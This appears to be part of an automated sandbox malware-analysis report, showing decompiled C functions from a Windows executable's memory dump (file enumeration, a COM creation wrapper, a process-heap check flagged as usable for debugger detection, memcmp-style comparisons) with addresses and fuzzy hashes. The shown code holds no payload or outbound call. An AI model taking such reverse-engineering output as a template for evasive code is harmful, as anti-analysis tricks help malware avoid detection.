                                                  					_t5 = _t118 + 1; // 0x1
                                                  					_t86 = _t5 + _t95;
                                                  					_t125 = E00406841(_t86, 2);
                                                  					if(_t118 == 0) {
                                                  						L7:
                                                  						_push(_v8);
                                                  						_t86 = _t86 - _t118;
                                                  						_t47 = E004071D0(_t125 + _t118 * 2, _t86, _a4);
                                                  						_t133 = _t132 + 0x10;
                                                  						if(_t47 != 0) {
                                                  							goto L12;
                                                  						} else {
                                                  							_t122 = _a16;
                                                  							_t89 = E004076F1(_t122);
                                                  							if(_t89 == 0) {
                                                  								 *((intOrPtr*)( *((intOrPtr*)(_t122 + 4)))) = _t125;
                                                  								 *((intOrPtr*)(_t122 + 4)) =  *((intOrPtr*)(_t122 + 4)) + 4;
                                                  								_t89 = 0;
                                                  							} else {
                                                  								E00406775(_t125);
                                                  							}
                                                  							E00406775(0);
                                                  							_t80 = _t89;
                                                  							goto L4;
                                                  						}
                                                  					} else {
                                                  						_push(_t118);
                                                  						_t82 = E004071D0(_t125, _t86, _a8);
                                                  						_t133 = _t132 + 0x10;
                                                  						if(_t82 != 0) {
                                                  							L12:
                                                  							_push(0);
                                                  							_push(0);
                                                  							_push(0);
                                                  							_push(0);
                                                  							_push(0);
                                                  							E0040706D();
                                                  							asm("int3");
                                                  							_t131 = _t133;
                                                  							_t134 = _t133 - 0x264;
                                                  							_t50 =  *0x4150a8; // 0x90cea005
                                                  							_v48 = _t50 ^ _t133;
                                                  							_t112 = _v32;
                                                  							_t98 = _v28;
                                                  							_push(_t86);
                                                  							_t87 = _v36;
                                                  							_v648 = _t98;
                                                  							_push(_t125);
                                                  							_push(_t118);
                                                  							if(_t112 != _t87) {
                                                  								while(E004076CD( *_t112 & 0x0000ffff) == 0) {
                                                  									_t112 = _t112 - 2;
                                                  									if(_t112 != _t87) {
                                                  										continue;
                                                  									}
                                                  									break;
                                                  								}
                                                  								_t98 = _v612;
                                                  							}
                                                  							_t126 =  *_t112 & 0x0000ffff;
                                                  							if(( *_t112 & 0x0000ffff) != 0x3a || _t112 ==  &(_t87[1])) {
                                                  								_t52 = E004076CD(_t126);
                                                  								asm("sbb eax, eax");
                                                  								_t119 = 0;
                                                  								_v616 =  ~(_t52 & 0x000000ff) & (_t112 - _t87 >> 0x00000001) + 0x00000001;
                                                  								_t127 = FindFirstFileExW(_t87, 0,  &_v604, 0, 0, 0);
                                                  								_t58 = _v612;
                                                  								if(_t127 != 0xffffffff) {
                                                  									_v620 =  *((intOrPtr*)(_t58 + 4)) -  *_t58 >> 2;
                                                  									_t103 = 0x2e;
                                                  									do {
                                                  										if(_v604.cFileName != _t103 || _v558 != _t119 && (_v558 != _t103 || _v556 != _t119)) {
                                                  											_push(_t58);
                                                  											_t60 = E004074A7(_t87, _t103, _t119, _t127,  &(_v604.cFileName), _t87, _v616);
                                                  											_t134 = _t134 + 0x10;
                                                  											if(_t60 != 0) {
                                                  												_t119 = _t60;
                                                  											} else {
                                                  												goto L28;
                                                  											}
                                                  										} else {
                                                  											goto L28;
                                                  										}
                                                  										L32:
                                                  										FindClose(_t127);
                                                  										goto L33;
                                                  										L28:
                                                  										_t65 = FindNextFileW(_t127,  &_v604);
                                                  										_t58 = _v612;
                                                  										_t103 = 0x2e;
                                                  									} while (_t65 != 0);
                                                  									_t116 =  *_t58;
                                                  									_t106 = _v620;
                                                  									_t68 =  *((intOrPtr*)(_t58 + 4)) -  *_t58 >> 2;
                                                  									if(_v620 !=  *((intOrPtr*)(_t58 + 4)) -  *_t58 >> 2) {
                                                  										E0040A140(_t87, _t119, _t127, _t116 + _t106 * 4, _t68 - _t106, 4, E00407267);
                                                  									}
                                                  									goto L32;
                                                  								} else {
                                                  									_push(_t58);
                                                  									_t119 = E004074A7(_t87,  &_v605, 0, _t127, _t87, 0, 0);
                                                  								}
                                                  								L33:
                                                  							} else {
                                                  								_push(_t98);
                                                  								E004074A7(_t87, _t98, 0, _t126, _t87, 0, 0);
                                                  							}
                                                  							return E004032D1(_v12 ^ _t131);
                                                  						} else {
                                                  							goto L7;
                                                  						}
                                                  					}
                                                  				} else {
                                                  					_t80 = 0xc;
                                                  					L4:
                                                  					return _t80;
                                                  				}
                                                  			}
                                                  0x004074db

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 41fa5c3f62130d5cd155efdfba912a8a7f39a8059f1021e224edf0135f45a518
                                                  • Instruction ID: dab23b6b6fe37a02db016751518925c348f61891514e70184756b485444f3db0
                                                  • Opcode Fuzzy Hash: 41fa5c3f62130d5cd155efdfba912a8a7f39a8059f1021e224edf0135f45a518
                                                  • Instruction Fuzzy Hash: A031C872D042197FCB24DF69CC89DBB7BB9EB84314F14457DF905A7281EA34AE40CA58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 25%
                                                  			// Decompiler output (quality 25%). Creates a COM object for the CLSID in _a4 and hands
                                                  			// back an interface pointer via _a8; the IIDs live at fixed data addresses in the image.
                                                  			E00401120(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
                                                  				intOrPtr _v8;
                                                  				void* _v12;
                                                  				void* _v16;
                                                  				char* _t23;
                                                  
                                                  				_t23 =  &_v16;
                                                  				// dwClsContext 3 = CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER; riid at 0x40f1d4; ppv = &_v16
                                                  				__imp__CoCreateInstance(_a4, 0, 3, 0x40f1d4, _t23);
                                                  				_v8 = _t23;                                   // decompiler reuses _t23 for the HRESULT in eax
                                                  				if(_v8 >= 0) {
                                                  					// vtable slot 0 = IUnknown::QueryInterface(IID at 0x40f204, &_v12)
                                                  					_v8 =  *((intOrPtr*)( *((intOrPtr*)( *_v16))))(_v16, 0x40f204,  &_v12);
                                                  					// vtable slot 2 (offset 8) = IUnknown::Release on the original interface
                                                  					 *((intOrPtr*)( *((intOrPtr*)( *_v16 + 8))))(_v16);
                                                  					if(_v8 >= 0) {
                                                  						// QueryInterface(IID at 0x40f214) on the second interface, result written to *_a12
                                                  						_v8 =  *((intOrPtr*)( *((intOrPtr*)( *_v12))))(_v12, 0x40f214, _a12);
                                                  						if(_v8 >= 0) {
                                                  							 *_a8 = _v12;
                                                  							return 1;
                                                  						}
                                                  						// failure path: Release the second interface before returning
                                                  						 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
                                                  						return 0;
                                                  					}
                                                  					return 0;
                                                  				}
                                                  				return 0;
                                                  			}

                                                  APIs
                                                  • CoCreateInstance.OLE32(?,00000000,00000003,0040F1D4,?), ref: 00401137
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: CreateInstance
                                                  • String ID:
                                                  • API String ID: 542301482-0
                                                  • Opcode ID: df32a7c287695565c42c768e4ba6686de5cbcf5f28644733c0cd95780d0f4fa0
                                                  • Instruction ID: 13465c9f114bc17d937046b70a693987da5458754414a056d7e360e26772ba97
                                                  • Opcode Fuzzy Hash: df32a7c287695565c42c768e4ba6686de5cbcf5f28644733c0cd95780d0f4fa0
                                                  • Instruction Fuzzy Hash: F821ED79A00108EFCB04DFA4D884F9DB7B5EB8C704F1081A9EA15AB390D774AE45CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			// Caches the process heap handle in the global at 0x4163f0 and returns whether it is non-NULL.
                                                  			// GetProcessHeap is one of the calls the report flags as usable for debugger detection.
                                                  			E004092F9() {
                                                  				signed int _t3;
                                                  
                                                  				_t3 = GetProcessHeap();
                                                  				 *0x4163f0 = _t3;
                                                  				// decompiler rendering of "setne al": only the low byte (handle != 0) is the result
                                                  				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                                                  			}

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: HeapProcess
                                                  • String ID:
                                                  • API String ID: 54951025-0
                                                  • Opcode ID: b0e339a411bed3eeb4b1ebc583c3354927c8f25eee9689a5a94ddc396066fb49
                                                  • Instruction ID: 3bd2f762acb2896173618e5eb970aea460fedd6edf536ec2e8f547fd3fe9c417
                                                  • Opcode Fuzzy Hash: b0e339a411bed3eeb4b1ebc583c3354927c8f25eee9689a5a94ddc396066fb49
                                                  • Instruction Fuzzy Hash: F8A011302002028B83208F38AB082083AA8AA002C0B0280B8A828E0020EB3080008A0A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			// Lexicographic compare of two 32-byte blocks (esi-0x1e..esi+1 vs edx-0x1e..edx+1):
                                                  			// compared one dword at a time, and on a mismatch the four bytes are compared as
                                                  			// unsigned values to produce an ordering of -1, 0 or 1 in _t241 (a memcmp-style routine).
                                                  			E004041EF(void* __edx, void* __esi) {
                                                  				signed int _t192;
                                                  				signed char _t193;
                                                  				signed char _t194;
                                                  				signed char _t195;
                                                  				signed char _t196;
                                                  				signed char _t198;
                                                  				signed int _t241;
                                                  				void* _t287;
                                                  				void* _t292;
                                                  				void* _t294;
                                                  				void* _t296;
                                                  				void* _t298;
                                                  				void* _t300;
                                                  				void* _t302;
                                                  				void* _t304;
                                                  				void* _t306;
                                                  				void* _t308;
                                                  				void* _t310;
                                                  				void* _t312;
                                                  				void* _t314;
                                                  				void* _t316;
                                                  				void* _t318;
                                                  				void* _t320;
                                                  				void* _t322;
                                                  				void* _t324;
                                                  				void* _t326;
                                                  				void* _t327;
                                                  
                                                  				_t327 = __esi;
                                                  				_t287 = __edx;
                                                  				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
                                                  					_t241 = 0;
                                                  					L15:
                                                  					if(_t241 != 0) {
                                                  						goto L2;
                                                  					}
                                                  					_t193 =  *(_t327 - 0x1a);
                                                  					if(_t193 ==  *(_t287 - 0x1a)) {
                                                  						_t241 = 0;
                                                  						L26:
                                                  						if(_t241 != 0) {
                                                  							goto L2;
                                                  						}
                                                  						_t194 =  *(_t327 - 0x16);
                                                  						if(_t194 ==  *(_t287 - 0x16)) {
                                                  							_t241 = 0;
                                                  							L37:
                                                  							if(_t241 != 0) {
                                                  								goto L2;
                                                  							}
                                                  							_t195 =  *(_t327 - 0x12);
                                                  							if(_t195 ==  *(_t287 - 0x12)) {
                                                  								_t241 = 0;
                                                  								L48:
                                                  								if(_t241 != 0) {
                                                  									goto L2;
                                                  								}
                                                  								_t196 =  *(_t327 - 0xe);
                                                  								if(_t196 ==  *(_t287 - 0xe)) {
                                                  									_t241 = 0;
                                                  									L59:
                                                  									if(_t241 != 0) {
                                                  										goto L2;
                                                  									}
                                                  									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
                                                  										_t241 = 0;
                                                  										L70:
                                                  										if(_t241 != 0) {
                                                  											goto L2;
                                                  										}
                                                  										_t198 =  *(_t327 - 6);
                                                  										if(_t198 ==  *(_t287 - 6)) {
                                                  											_t241 = 0;
                                                  											L81:
                                                  											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
                                                  											}
                                                  											goto L2;
                                                  										}
                                                  										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
                                                  										if(_t292 == 0) {
                                                  											L74:
                                                  											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
                                                  											if(_t294 == 0) {
                                                  												L76:
                                                  												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
                                                  												if(_t296 == 0) {
                                                  													L78:
                                                  													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
                                                  													if(_t241 != 0) {
                                                  														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                                  													}
                                                  													goto L81;
                                                  												}
                                                  												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
                                                  												if(_t241 != 0) {
                                                  													goto L2;
                                                  												}
                                                  												goto L78;
                                                  											}
                                                  											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
                                                  											if(_t241 != 0) {
                                                  												goto L2;
                                                  											}
                                                  											goto L76;
                                                  										}
                                                  										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
                                                  										if(_t241 != 0) {
                                                  											goto L2;
                                                  										}
                                                  										goto L74;
                                                  									}
                                                  									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
                                                  									if(_t298 == 0) {
                                                  										L63:
                                                  										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
                                                  										if(_t300 == 0) {
                                                  											L65:
                                                  											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
                                                  											if(_t302 == 0) {
                                                  												L67:
                                                  												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
                                                  												if(_t241 != 0) {
                                                  													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                                  												}
                                                  												goto L70;
                                                  											}
                                                  											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
                                                  											if(_t241 != 0) {
                                                  												goto L2;
                                                  											}
                                                  											goto L67;
                                                  										}
                                                  										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
                                                  										if(_t241 != 0) {
                                                  											goto L2;
                                                  										}
                                                  										goto L65;
                                                  									}
                                                  									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
                                                  									if(_t241 != 0) {
                                                  										goto L2;
                                                  									}
                                                  									goto L63;
                                                  								}
                                                  								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
                                                  								if(_t304 == 0) {
                                                  									L52:
                                                  									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
                                                  									if(_t306 == 0) {
                                                  										L54:
                                                  										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
                                                  										if(_t308 == 0) {
                                                  											L56:
                                                  											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
                                                  											if(_t241 != 0) {
                                                  												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                                  											}
                                                  											goto L59;
                                                  										}
                                                  										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
                                                  										if(_t241 != 0) {
                                                  											goto L2;
                                                  										}
                                                  										goto L56;
                                                  									}
                                                  									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
                                                  									if(_t241 != 0) {
                                                  										goto L2;
                                                  									}
                                                  									goto L54;
                                                  								}
                                                  								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
                                                  								if(_t241 != 0) {
                                                  									goto L2;
                                                  								}
                                                  								goto L52;
                                                  							}
                                                  							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
                                                  							if(_t310 == 0) {
                                                  								L41:
                                                  								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
                                                  								if(_t312 == 0) {
                                                  									L43:
                                                  									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
                                                  									if(_t314 == 0) {
                                                  										L45:
                                                  										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
                                                  										if(_t241 != 0) {
                                                  											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                                  										}
                                                  										goto L48;
                                                  									}
                                                  									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
                                                  									if(_t241 != 0) {
                                                  										goto L2;
                                                  									}
                                                  									goto L45;
                                                  								}
                                                  								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
                                                  								if(_t241 != 0) {
                                                  									goto L2;
                                                  								}
                                                  								goto L43;
                                                  							}
                                                  							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
                                                  							if(_t241 != 0) {
                                                  								goto L2;
                                                  							}
                                                  							goto L41;
                                                  						}
                                                  						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
                                                  						if(_t316 == 0) {
                                                  							L30:
                                                  							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
                                                  							if(_t318 == 0) {
                                                  								L32:
                                                  								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
                                                  								if(_t320 == 0) {
                                                  									L34:
                                                  									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
                                                  									if(_t241 != 0) {
                                                  										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                                  									}
                                                  									goto L37;
                                                  								}
                                                  								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
                                                  								if(_t241 != 0) {
                                                  									goto L2;
                                                  								}
                                                  								goto L34;
                                                  							}
                                                  							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
                                                  							if(_t241 != 0) {
                                                  								goto L2;
                                                  							}
                                                  							goto L32;
                                                  						}
                                                  						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
                                                  						if(_t241 != 0) {
                                                  							goto L2;
                                                  						}
                                                  						goto L30;
                                                  					}
                                                  					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
                                                  					if(_t322 == 0) {
                                                  						L19:
                                                  						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
                                                  						if(_t324 == 0) {
                                                  							L21:
                                                  							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
                                                  							if(_t326 == 0) {
                                                  								L23:
                                                  								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
                                                  								if(_t241 != 0) {
                                                  									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                                  								}
                                                  								goto L26;
                                                  							}
                                                  							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
                                                  							if(_t241 != 0) {
                                                  								goto L2;
                                                  							}
                                                  							goto L23;
                                                  						}
                                                  						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
                                                  						if(_t241 != 0) {
                                                  							goto L2;
                                                  						}
                                                  						goto L21;
                                                  					}
                                                  					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
                                                  					if(_t241 != 0) {
                                                  						goto L2;
                                                  					}
                                                  					goto L19;
                                                  				} else {
                                                  					__edi = __al & 0x000000ff;
                                                  					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
                                                  					if(__edi == 0) {
                                                  						L8:
                                                  						__edi =  *(__esi - 0x1d) & 0x000000ff;
                                                  						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                                                  						if(__edi == 0) {
                                                  							L10:
                                                  							__edi =  *(__esi - 0x1c) & 0x000000ff;
                                                  							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                                  							if(__edi == 0) {
                                                  								L12:
                                                  								__ecx =  *(__esi - 0x1b) & 0x000000ff;
                                                  								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
                                                  								if(__ecx != 0) {
                                                  									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                                                  								}
                                                  								goto L15;
                                                  							}
                                                  							0 = 0 | __edi > 0x00000000;
                                                  							__ecx = (__edi > 0) * 2 != 1;
                                                  							if((__edi > 0) * 2 != 1) {
                                                  								L2:
                                                  								_t192 = _t241;
                                                  								return _t192;
                                                  							}
                                                  							goto L12;
                                                  						}
                                                  						0 = 0 | __edi > 0x00000000;
                                                  						__ecx = (__edi > 0) * 2 != 1;
                                                  						if((__edi > 0) * 2 != 1) {
                                                  							goto L2;
                                                  						}
                                                  						goto L10;
                                                  					}
                                                  					0 = 0 | __edi > 0x00000000;
                                                  					__ecx = (__edi > 0) * 2 != 1;
                                                  					if((__edi > 0) * 2 != 1) {
                                                  						goto L2;
                                                  					}
                                                  					goto L8;
                                                  				}
                                                  			}

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                  • Instruction ID: a2f8e76f945d5026de02732b774f2ea7eabe4b13db49b9a13ca587bfdcb124bf
                                                  • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                  • Instruction Fuzzy Hash: AAC1A3732050534ADF6D4A39843417FBAA15ED27B231A07BFD8F2DB2D4EE38C6689614
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00404624(void* __edx, void* __esi) {
                                                  				signed int _t197;
                                                  				signed char _t198;
                                                  				signed char _t199;
                                                  				signed char _t200;
                                                  				signed char _t202;
                                                  				signed char _t203;
                                                  				signed int _t246;
                                                  				void* _t294;
                                                  				void* _t297;
                                                  				void* _t299;
                                                  				void* _t301;
                                                  				void* _t303;
                                                  				void* _t305;
                                                  				void* _t307;
                                                  				void* _t309;
                                                  				void* _t311;
                                                  				void* _t313;
                                                  				void* _t315;
                                                  				void* _t317;
                                                  				void* _t319;
                                                  				void* _t321;
                                                  				void* _t323;
                                                  				void* _t325;
                                                  				void* _t327;
                                                  				void* _t329;
                                                  				void* _t331;
                                                  				void* _t333;
                                                  				void* _t335;
                                                  				void* _t336;
                                                  
                                                  				_t336 = __esi;
                                                  				_t294 = __edx;
                                                  				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
                                                  					_t246 = 0;
                                                  					L14:
                                                  					if(_t246 != 0) {
                                                  						goto L1;
                                                  					}
                                                  					_t198 =  *(_t336 - 0x1b);
                                                  					if(_t198 ==  *(_t294 - 0x1b)) {
                                                  						_t246 = 0;
                                                  						L25:
                                                  						if(_t246 != 0) {
                                                  							goto L1;
                                                  						}
                                                  						_t199 =  *(_t336 - 0x17);
                                                  						if(_t199 ==  *(_t294 - 0x17)) {
                                                  							_t246 = 0;
                                                  							L36:
                                                  							if(_t246 != 0) {
                                                  								goto L1;
                                                  							}
                                                  							_t200 =  *(_t336 - 0x13);
                                                  							if(_t200 ==  *(_t294 - 0x13)) {
                                                  								_t246 = 0;
                                                  								L47:
                                                  								if(_t246 != 0) {
                                                  									goto L1;
                                                  								}
                                                  								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
                                                  									_t246 = 0;
                                                  									L58:
                                                  									if(_t246 != 0) {
                                                  										goto L1;
                                                  									}
                                                  									_t202 =  *(_t336 - 0xb);
                                                  									if(_t202 ==  *(_t294 - 0xb)) {
                                                  										_t246 = 0;
                                                  										L69:
                                                  										if(_t246 != 0) {
                                                  											goto L1;
                                                  										}
                                                  										_t203 =  *(_t336 - 7);
                                                  										if(_t203 ==  *(_t294 - 7)) {
                                                  											_t246 = 0;
                                                  											L80:
                                                  											if(_t246 != 0) {
                                                  												goto L1;
                                                  											}
                                                  											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
                                                  											if(_t297 == 0) {
                                                  												L83:
                                                  												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
                                                  												if(_t299 == 0) {
                                                  													L3:
                                                  													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
                                                  													if(_t246 != 0) {
                                                  														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                  													}
                                                  													goto L1;
                                                  												}
                                                  												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
                                                  												if(_t246 != 0) {
                                                  													goto L1;
                                                  												} else {
                                                  													goto L3;
                                                  												}
                                                  											}
                                                  											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
                                                  											if(_t246 != 0) {
                                                  												goto L1;
                                                  											}
                                                  											goto L83;
                                                  										}
                                                  										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
                                                  										if(_t301 == 0) {
                                                  											L73:
                                                  											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
                                                  											if(_t303 == 0) {
                                                  												L75:
                                                  												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
                                                  												if(_t305 == 0) {
                                                  													L77:
                                                  													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
                                                  													if(_t246 != 0) {
                                                  														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                  													}
                                                  													goto L80;
                                                  												}
                                                  												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
                                                  												if(_t246 != 0) {
                                                  													goto L1;
                                                  												}
                                                  												goto L77;
                                                  											}
                                                  											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
                                                  											if(_t246 != 0) {
                                                  												goto L1;
                                                  											}
                                                  											goto L75;
                                                  										}
                                                  										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
                                                  										if(_t246 != 0) {
                                                  											goto L1;
                                                  										}
                                                  										goto L73;
                                                  									}
                                                  									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
                                                  									if(_t307 == 0) {
                                                  										L62:
                                                  										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
                                                  										if(_t309 == 0) {
                                                  											L64:
                                                  											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
                                                  											if(_t311 == 0) {
                                                  												L66:
                                                  												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
                                                  												if(_t246 != 0) {
                                                  													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                  												}
                                                  												goto L69;
                                                  											}
                                                  											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
                                                  											if(_t246 != 0) {
                                                  												goto L1;
                                                  											}
                                                  											goto L66;
                                                  										}
                                                  										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
                                                  										if(_t246 != 0) {
                                                  											goto L1;
                                                  										}
                                                  										goto L64;
                                                  									}
                                                  									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
                                                  									if(_t246 != 0) {
                                                  										goto L1;
                                                  									}
                                                  									goto L62;
                                                  								}
                                                  								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
                                                  								if(_t313 == 0) {
                                                  									L51:
                                                  									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
                                                  									if(_t315 == 0) {
                                                  										L53:
                                                  										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
                                                  										if(_t317 == 0) {
                                                  											L55:
                                                  											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
                                                  											if(_t246 != 0) {
                                                  												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                  											}
                                                  											goto L58;
                                                  										}
                                                  										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
                                                  										if(_t246 != 0) {
                                                  											goto L1;
                                                  										}
                                                  										goto L55;
                                                  									}
                                                  									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
                                                  									if(_t246 != 0) {
                                                  										goto L1;
                                                  									}
                                                  									goto L53;
